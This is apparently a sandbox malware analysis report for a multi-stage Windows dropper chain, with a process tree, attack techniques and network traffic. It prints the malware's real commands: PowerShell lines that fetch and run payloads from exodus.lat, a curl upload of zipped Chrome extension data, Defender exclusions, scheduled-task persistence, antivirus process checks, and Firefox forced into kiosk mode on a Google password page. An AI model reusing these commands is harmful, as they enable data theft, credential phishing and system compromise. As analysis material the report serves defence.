PID 4956 wrote to memory of 3844	4956	cmd.exe	123
PID 4956 wrote to memory of 2544	4956	cmd.exe	124
PID 4956 wrote to memory of 2544	4956	cmd.exe	124
PID 4956 wrote to memory of 2544	4956	cmd.exe	124
PID 4956 wrote to memory of 1896	4956	cmd.exe	125
PID 4956 wrote to memory of 1896	4956	cmd.exe	125
PID 4956 wrote to memory of 1896	4956	cmd.exe	125
PID 2564 wrote to memory of 1500	2564	skotes.exe	126
PID 2564 wrote to memory of 1500	2564	skotes.exe	126
PID 2564 wrote to memory of 1500	2564	skotes.exe	126
PID 4956 wrote to memory of 2208	4956	cmd.exe	128
PID 4956 wrote to memory of 2208	4956	cmd.exe	128
PID 4956 wrote to memory of 2208	4956	cmd.exe	128
PID 4956 wrote to memory of 544	4956	cmd.exe	129
PID 4956 wrote to memory of 544	4956	cmd.exe	129
PID 4956 wrote to memory of 544	4956	cmd.exe	129
PID 4956 wrote to memory of 3564	4956	cmd.exe	130
PID 4956 wrote to memory of 3564	4956	cmd.exe	130
PID 4956 wrote to memory of 3564	4956	cmd.exe	130
PID 4956 wrote to memory of 1312	4956	cmd.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3364
- C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe
  "C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe"
  2⤵
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3448
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4048
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1848
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2564
      - C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1640
        7⤵
        Program crash
        
        PID:4532
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1620
        7⤵
        Program crash
        
        PID:3952
      - C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp" /SL5="$80238,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1988
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause raf_encoder_1252
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3844
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause raf_encoder_1252
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
        
        "C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1888
      - C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3620
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4956
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3844
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1896
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 491505
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:544
        
        C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
        
        Dr.com B
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3564
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
        9⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6340
        
        C:\Windows\SysWOW64\net.exe
        
        net session
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:6404
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 session
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:6432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
        11⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
        11⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6876
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5524
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"
        12⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:6052
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s https://api.ipify.org
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:6060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:3060
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
        
        "C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:6616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6924
        
        C:\Windows\SysWOW64\net.exe
        
        net session
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:3248
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 session
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:4732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
        11⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe
        
        "C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"
        12⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:6300
        
        C:\Users\Admin\AppData\Local\asm\mi.exe
        
        "C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2020
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 15
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1312
      - C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1632
        7⤵
        Program crash
        
        PID:4748
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1652
        7⤵
        Program crash
        
        PID:3936
      - C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2388
      - C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:512
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4532
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4796
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4704
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4572
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:4396
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1852
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1964 -prefMapHandle 1956 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f03138-6534-469c-8f21-5220d70f3425} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" gpu
        9⤵
        
        PID:628
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a9b937f-b66b-4cc9-a25d-ce5d9d590e9a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" socket
        9⤵
        
        PID:1172
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3132 -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d9752fd-55e6-47e9-b2d7-aad876e04da4} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
        9⤵
        
        PID:216
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64c0a44d-dba6-499e-8750-28083730bc69} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
        9⤵
        
        PID:1140
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4af03d6e-1024-4cb8-ab8e-fbff5239d5a3} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" utility
        9⤵
        Checks processor information in registry
        
        PID:5180
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89a3350a-4d71-49fb-ae2d-0bb5475aadd7} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
        9⤵
        
        PID:7068
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5380 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e83fb09-95a2-42b0-b296-22cf085bf81a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
        9⤵
        
        PID:7140
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5588 -prefMapHandle 5592 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0e71c56-2449-4833-8005-4cf322f47822} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
        9⤵
        
        PID:2904
      - C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe"
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6684
      - C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1648
        5⤵
        Program crash
        
        PID:3652
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1664
        5⤵
        Program crash
        
        PID:3468
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3748
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2904 -ip 2904
1⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2904 -ip 2904
1⤵
PID:1264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4764 -ip 4764
1⤵
PID:3172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4764 -ip 4764
1⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1500 -ip 1500
1⤵
PID:4900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500
1⤵
PID:628

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6604

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:940

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

74.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

atten-supporse.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

atten-supporse.biz

IN A

Response

atten-supporse.biz

IN A

172.67.165.166

atten-supporse.biz

IN A

104.21.16.9
POST

https://atten-supporse.biz/api

2M4078.exe

Remote address:

172.67.165.166:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=np5mi08ag95r85e7h2ahahkash; expires=Mon, 31-Mar-2025 20:03:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vcQV1X2sxX9BD%2F74PIiIjziQ5zVSQvJfO4v9pxMhwYISPPQf%2F34z4qoNZAXv5YkTRC0uYA0xs09%2F1aMPWf8Rl26Tn1MZzpi4aCNqcwTwdTQDnVBO3WajOIBsNN9hWaiqHvoPzFI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c693992a79b9-LHR
alt-svc: h3=":443"; ma=86400
